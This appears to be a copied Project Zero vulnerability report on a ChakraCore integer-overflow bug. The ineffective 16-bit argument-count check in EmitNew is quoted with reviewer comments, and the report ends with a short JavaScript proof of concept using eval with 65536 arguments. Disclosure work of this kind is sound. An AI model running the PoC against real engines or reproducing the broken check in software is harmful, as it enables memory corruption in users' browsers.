<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1315
The bytecode generator uses the "EmitNew" function to emit bytecode for `new` expressions.
Here is how the function checks the argument count for integer overflow:
// Emits bytecode for a `new` expression. The argument count is carried in a
// Js::ArgSlot (a 16-bit unsigned integer, per the report below), so a count of
// 0xFFFF or more cannot be represented once the implicit "this" is added.
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
|
|
{
|
|
Js::ArgSlot argCount = pnode->sxCall.argCount;
|
|
// 16-bit increment: wraps to 0 if argCount is already 0xFFFF. Whether the
// parse-node field itself was already truncated is not visible here.
argCount++; // include "this"
|
|
|
|
BOOL fSideEffectArgs = FALSE;
|
|
// CountArguments returns the real count as an unsigned int; this is the only
// value in the function wide enough to reveal a count that does not fit in
// a Js::ArgSlot.
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
|
|
// NOTE(review): Assert is presumably compiled out of release builds — TODO
// confirm. If so, nothing in a release build compares the 16-bit argCount to
// the full-width tmpCount, and a truncated count goes unnoticed.
Assert(argCount == tmpCount);
|
|
|
|
// BUG: argCount is already a Js::ArgSlot, so the cast is an identity
// conversion and this condition can never be true. The overflow check is a
// no-op and OutOfMemory is never thrown from here.
// NOTE(review): the width check has to be made on the unsigned int count
// (e.g. tmpCount != (Js::ArgSlot)tmpCount) before the truncated value is used.
if (argCount != (Js::ArgSlot)argCount)
|
|
{
|
|
Js::Throw::OutOfMemory();
|
|
}
|
|
...
|
|
}
"Js::ArgSlot" is a 16-bit unsigned integer type, and "argCount" is itself declared as a Js::ArgSlot, so the cast in "if (argCount != (Js::ArgSlot)argCount)" converts the value to the type it already has: the comparison is always false and the check can never fire. The only full-width count in the function is the unsigned int "tmpCount" returned by CountArguments, and the only comparison against it is the Assert, a debug-only check. So once the argument count (plus the implicit "this") no longer fits in 16 bits, the truncated argCount is used and no error is raised — the check cannot prevent the integer overflow at all.
PoC (builds a `new Array(...)` expression with 0x10000 arguments, so the argument count plus the implicit "this" does not fit in a 16-bit Js::ArgSlot):
-->
// Build a comma-separated list of 0x10000 (65536) literal arguments.
let args = new Array(0x10000);
|
|
args = args.fill(0x1234).join(', ');
|
|
// Evaluate a `new` expression with 0x10000 arguments; together with the
// implicit "this" the count exceeds what a 16-bit Js::ArgSlot can hold, which
// the check in EmitNew (above) fails to catch.
eval('new Array(' + args + ')'); |
|
eval('new Array(' + args + ')'); |